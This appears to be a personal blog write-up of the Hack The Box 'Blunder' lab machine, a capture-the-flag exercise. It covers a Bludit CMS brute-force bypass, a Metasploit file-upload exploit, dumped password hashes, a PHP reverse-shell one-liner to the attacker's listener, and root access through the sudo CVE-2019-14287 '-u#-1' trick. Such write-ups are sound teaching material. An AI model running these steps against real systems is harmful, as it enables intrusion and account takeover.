u915

Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Blunder

0 - Basic info

OS: Linux

IP: 10.10.10.191

1 - Reconnaissance and enumeration

sudo nmap -sS -sV -sC -O 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:24 CEST
Nmap scan report for 10.10.10.191
Host is up (0.041s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (89%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds

The firts scan with Dirbuster, shows the admin page /admin, /todo.txt and the robots.txt:

http://10.10.10.191/admin/

In the admin panel, appears BLUDIT. A quick Googling says that Bludit is a CMS for blogging.

Nothing useful on robots.txt but inside todo.txt there is interesting info:

10.10.10.191/todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

The firts user is fergus and Update the CMS is very interesting because maybe there is a flaw discovered by the admin of the site, probably related to outdated software.

So, searching exploits for Bludit:

searchsploit bludit

Bludit - Directory Traversal Image File Upload (Metasploit)
Bludit 3.9.12 - Directory Traversal 
bludit Pages Editor 3.0.0 - Arbitrary File Upload

Looking the source code:

<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.bootstrap.css?version=3.9.2">

The Bludit version is 3.9.2

2 - Vulnerability Identification

Also I found:

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

This post is about how to bypass the CSFR token validation to bruteforce Bludit. I can’t use Hydra by default, so I need to find something to bruteforce the admin page.

3 - Exploit

Bludit 3.9.2 exploit:

https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script/tree/master

Using the user Fergus and bruteforcing with the famous wordlist rockyou.txt

python exploit.py 10.10.10.191 fergus /usr/share/wordlists/rockyou.txt

But did not work.

Testing again using a custom wordlist using cewl, because is a Blog and there is a great source of information maybe there is something inside that the blogger used as password.

Custom wordlist

https://tools.kali.org/password-attacks/cewl

cewl -d 2 -m 6 -w docswords.txt 10.10.10.191

And bruteforcing again

python exploit.py 10.10.10.191 fergus custom.txt 
[*] Trying: Plugins
[*] Trying: Include
[*] Trying: service
[*] Trying: Stadia
[*] Trying: Dynamic
[*] Trying: blunder
[*] Trying: interesting
[*] Trying: devices
[*] Trying: Google
[*] Trying: content
[*] Trying: created
[*] Trying: Creation
[*] Trying: November
[*] Trying: Reading
[*] Trying: minute
[*] Trying: Awards
[*] Trying: Fantasy
[*] Trying: National
[*] Trying: players
[*] Trying: allows
[*] Trying: stream
[*] Trying: description
[*] Trying: Favicon
[*] Trying: Bootstrap
[*] Trying: bootstrap
[*] Trying: Styles
[*] Trying: Robots
[*] Trying: plugin
[*] Trying: Navbar
[*] Trying: Static
[*] Trying: Social
[*] Trying: Networks
[*] Trying: Content
[*] Trying: Stephen
[*] Trying: Sidebar
[*] Trying: nothing
[*] Trying: Footer
[*] Trying: Copyright
[*] Trying: Powered
[*] Trying: byEgotisticalSW
[*] Trying: Javascript
[*] Trying: American
[*] Trying: fiction
[*] Trying: novels
[*] Trying: feature
[*] Trying: series
[*] Trying: published
[*] Trying: received
[*] Trying: awarded
[*] Trying: literature
[*] Trying: centers
[*] Trying: through
[*] Trying: smartphones
[*] Trying: tablets
[*] Trying: library
[*] Trying: Breaked
[*] Trying: button
[*] Trying: September
[*] Trying: author
[*] Trying: horror
[*] Trying: supernatural
[*] Trying: suspense
[*] Trying: fantasy
[*] Trying: million
[*] Trying: copies
[*] Trying: adapted
[*] Trying: miniseries
[*] Trying: television
[*] Trying: including
[*] Trying: Richard
[*] Trying: Bachman
[*] Trying: written
[*] Trying: approximately
[*] Trying: stories
[*] Trying: collections
[*] Trying: Stoker
[*] Trying: British
[*] Trying: Society
[*] Trying: Foundation
[*] Trying: Distinguished
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
()

Great the password is RolandDeschain and I can login into the admin panel.

alt text

Metasploit

Now I can use one of the previous exploits. This time I used Metasploit:

linux/http/bludit_upload_images_exec

msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.5:8443 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading zcoxmsbSZa.png...
[*] Uploading .htaccess...
[*] Executing zcoxmsbSZa.png...
[*] Command shell session 1 opened (10.10.14.5:8443 -> 10.10.10.191:39706) at 2020-07-29 20:18:58 +0200
[+] Deleted .htaccess

pwd
/var/www/bludit-3.9.2/bl-content/tmp

Good, shell access. I am not able to get any user flag, so I need to gain User access.

User hashes

Enumerating the blog source code I found:

cat users.php

<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}

Identifying the hashes

2 users with hashes.

Using hash-identifier to identify the hashes:

hash-identifier bfcc887f62e36ea019e3295aafb8a3885966e265

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)
--------------------------------------------------
 HASH: exit

 Not Found.
--------------------------------------------------

But I could not crack the hash or find it on any crackinghash websites.

Hash #2

Enumerating again I found a another version (3.10.0a) of Bludit with another user and pass configuration file:

/var/bludit/3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

New user Hugo with password hash. This time I was lucky and the password is already cracked

alt text

Password120

Another reverse shell ?

Great I tried to use the user Hugo but my shell sucks and was unstable…

Started another reverse Shell

nc -lvp 8888
php -r '$sock=fsockopen("10.10.14.5",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

And upgraded the shell with Python:

python3 -c "import pty;pty.spawn('/bin/bash')"

User shell and flag

Now I can log in as Hugo:

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su - hugo
Password: Password120

hugo@blunder:~$ ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt

hugo@blunder:~$ cat user.txt
e0f8[...]d3a5

4 - Post-Exploitation and privilege escalation

This part is about how to get root as Hugo.

I started checking the sudo permissions:

hugo@blunder:/$ sudo -l

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

CVE-2019-14287 sudo

Inmediatly I recognised the flaw and CVE. For sudo 1.8.27

https://access.redhat.com/security/cve/cve-2019-14287

This CVE was very famous because affected a huge number of Linux distributions and is too easy to exploit, because is not handling properly the target ID user when is an invalid user ID like -1, but is necessary to have a rule inside like this:

(ALL, !root) /usr/bin/somecommand

Root shell and flag

Great, because this time means that I can use the ID -1 to execute /bin/bash as root

hugo@blunder:/$ sudo -u#-1 /bin/bash
root@blunder:/# cat /root/root.txt
bcb[...]7d1

Thanks for reading!